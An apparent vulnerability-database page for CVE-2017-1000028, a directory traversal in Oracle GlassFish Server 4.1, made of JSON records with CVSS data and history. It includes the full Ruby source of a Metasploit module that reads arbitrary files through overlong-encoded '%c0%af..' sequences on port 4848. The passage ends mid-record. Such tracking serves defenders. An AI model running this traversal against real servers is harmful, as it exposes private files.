Glassfish Server Open Source Edition 3.1.2.2 Vulnerabilities

{"id": "MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL", "type": "metasploit", "bulletinFamily": "exploit", "title": "Path Traversal in Oracle GlassFish Server Open Source Edition", "description": "This module exploits an unauthenticated directory traversal vulnerability which exists in administration console of Oracle GlassFish Server 4.1, which is listening by default on port 4848/TCP.\n", "published": "2018-07-31T12:29:03", "modified": "2020-10-02T20:00:37", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"], "cvelist": ["CVE-2017-1000028"], "lastseen": "2020-10-12T20:23:52", "viewCount": 745, "enchantments": {"dependencies": {"modified": "2020-10-12T20:23:52", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}], "rev": 2}, "score": {"modified": "2020-10-12T20:23:52", "rev": 2, "value": 6.0, "vector": "NONE"}, "vulnersScore": 6.0}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/glassfish_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',\n 'Description' => %q{\n This module exploits an unauthenticated directory traversal vulnerability\n which exists in administration console of Oracle GlassFish Server 4.1, which is\n listening by default on port 4848/TCP.\n },\n 'References' =>\n [\n ['CVE', '2017-1000028'],\n ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],\n ['EDB', '39441']\n ],\n 'Author' =>\n [\n 'Trustwave SpiderLabs', # Vulnerability discovery\n 'Dhiraj Mishra' # Metasploit module\n ],\n 'DisclosureDate' => '2015-08-08',\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n Opt::RPORT(4848),\n OptString.new('FILEPATH', [true, \"The path to the file to read\", '/windows/win.ini']),\n OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])\n ])\n end\n\n def run_host(ip)\n filename = datastore['FILEPATH']\n traversal = \"%c0%af..\" * datastore['DEPTH'] << filename\n\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => \"/theme/META-INF/prototype#{traversal}\"\n })\n\n unless res && res.code == 200\n print_error('Nothing was downloaded')\n return\n end\n\n vprint_good(\"#{peer} - #{res.body}\")\n path = store_loot(\n 'oracle.traversal',\n 'text/plain',\n ip,\n res.body,\n filename\n )\n print_good(\"File saved in: #{path}\")\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "edition": 2, "scheme": null}

{"cve": [{"id": "CVE-2017-1000028", "bulletinFamily": "NVD", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "published": "2017-07-17T13:18:00", "modified": "2019-05-03T18:27:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "cvelist": ["CVE-2017-1000028"], "type": "cve", "lastseen": "2021-04-23T00:07:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:30", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-10-03T13:07:30", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [], "hash": "93d190134f7cf056fe1732b6c35e20814272faa00585934c7933123ebba28687", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "cc9731cf4c024746d3d1b6370c53849a", "key": "cpeConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": "2020-10-03T13:07:30", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 21}, "differentElements": ["extraReferences"], "edition": 3, "lastseen": "2020-10-03T13:07:30"}, {"bulletin": {"affectedSoftware": [{"name": "oracle glassfish_server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2019-05-29T18:16:45", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "c0dc08e70d504725e6d781a0aa9f9280156e9c6edd21181224d83d28a7b78e48", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "c79a01038c69351f5f90791c61613a99", "key": "affectedSoftware"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": "2019-05-29T18:16:45", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 17}, "differentElements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 4, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:31", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-02-02T06:36:31", "rev": 2, "value": 3.9, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"}, {"name": "45198", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45198/"}, {"name": "45196", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45196/"}], "hash": "1727c5320a9d7fe7ca3977bcce2f8fa65862be7623c615ded6ff0ed6597a15e3", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "cc9731cf4c024746d3d1b6370c53849a", "key": "cpeConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "4b0aeedbf5a206718c463a4a6583d5b6", "key": "extraReferences"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "immutableFields": [], "lastseen": "2021-02-02T06:36:31", "modified": "2019-05-03T18:27:00", "objectVersion": "1.5", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 22}, "different_elements": ["cpeConfiguration"], "edition": 4, "lastseen": "2021-02-02T06:36:31"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-1000028"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-22"], "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:17", "references": [{"idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:17", "rev": 2, "value": 3.9, "vector": "NONE"}}, "hash": "9fa3f580009ef4308fc2063843f4eda5a188c2a1ff2726b9c1e28a2919ca731e", "hashmap": [{"hash": "6c12cee4678f175d08f6be18c93abe3e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0658497da393ba8e7c2a5f76cfc6647b", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "3434de2b1fab19da569c39a081dfad06", "key": "cpe"}, {"hash": "d9ff80eb1f8f16ad5085cb0c6512d073", "key": "references"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863", "key": "description"}, {"hash": "2eb2483a6f217835f88c76c0674603c3", "key": "href"}, {"hash": "bdf8ed67a9997025a9a245b20ac4e383", "key": "cvelist"}, {"hash": "fa6976392906bf29d603e82c07318c8e", "key": "modified"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e1caac248b67c5f0c5b467c530f7a100", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "8d39331d3e12d1c5a584bab92bd505a6", "key": "title"}, {"hash": "9976eff579ef3bfd6a4237accaf3acdb", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "54eea28cd58a8b1970d9e051e4c324e6", "key": "published"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000028", "id": "CVE-2017-1000028", "lastseen": "2020-09-21T14:31:17", "modified": "2019-05-03T18:27:00", "objectVersion": "1.3", "published": "2017-07-17T13:18:00", "references": ["https://www.exploit-db.com/exploits/45196/", "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "https://www.exploit-db.com/exploits/45198/"], "reporter": "cve@mitre.org", "title": "CVE-2017-1000028", "type": "cve", "viewCount": 17}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:31:17"}], "edition": 5, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "e1caac248b67c5f0c5b467c530f7a100"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "3434de2b1fab19da569c39a081dfad06"}, {"key": "cpe23", "hash": "6c12cee4678f175d08f6be18c93abe3e"}, {"key": "cpeConfiguration", "hash": "ecbb03fbf0603c00f8bb90de8a2a0f59"}, {"key": "cvelist", "hash": "bdf8ed67a9997025a9a245b20ac4e383"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "9976eff579ef3bfd6a4237accaf3acdb"}, {"key": "cwe", "hash": "0658497da393ba8e7c2a5f76cfc6647b"}, {"key": "description", "hash": "ac3f4b8c5744f5fcafa5a05b0b3a6863"}, {"key": "extraReferences", "hash": "4b0aeedbf5a206718c463a4a6583d5b6"}, {"key": "href", "hash": "2eb2483a6f217835f88c76c0674603c3"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "fa6976392906bf29d603e82c07318c8e"}, {"key": "published", "hash": "54eea28cd58a8b1970d9e051e4c324e6"}, {"key": "references", "hash": "d9ff80eb1f8f16ad5085cb0c6512d073"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "8d39331d3e12d1c5a584bab92bd505a6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a21b44a7fca00f8e9385dd0619746f212d9f8168a4818577829d6ed6fc994a25", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "nessus", "idList": ["GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}], "modified": "2021-04-23T00:07:43", "rev": 2}, "score": {"value": 3.9, "vector": "NONE", "modified": "2021-04-23T00:07:43", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:oracle:glassfish_server:4.1"], "affectedSoftware": [{"cpeName": "oracle:glassfish_server", "name": "oracle glassfish server", "operator": "eq", "version": "4.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*"], "cwe": ["CWE-22"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List", "Exploit"], "url": "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904"}, {"name": "45198", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45198/"}, {"name": "45196", "refsource": "EXPLOIT-DB", "tags": ["Third Party Advisory", "Exploit", "VDB Entry"], "url": "https://www.exploit-db.com/exploits/45196/"}], "immutableFields": []}], "ubuntucve": [{"id": "UB:CVE-2017-1000028", "vendorId": null, "hash": "a42f6aeb5c6e16a4e2934bc63826957a", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2017-1000028", "description": "Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both\nauthenticated and unauthenticated Directory Traversal vulnerability, that\ncan be exploited by issuing a specially crafted HTTP GET request.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | vulnerable code not present in package.\n", "published": "2017-07-17T00:00:00", "modified": "2017-07-17T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 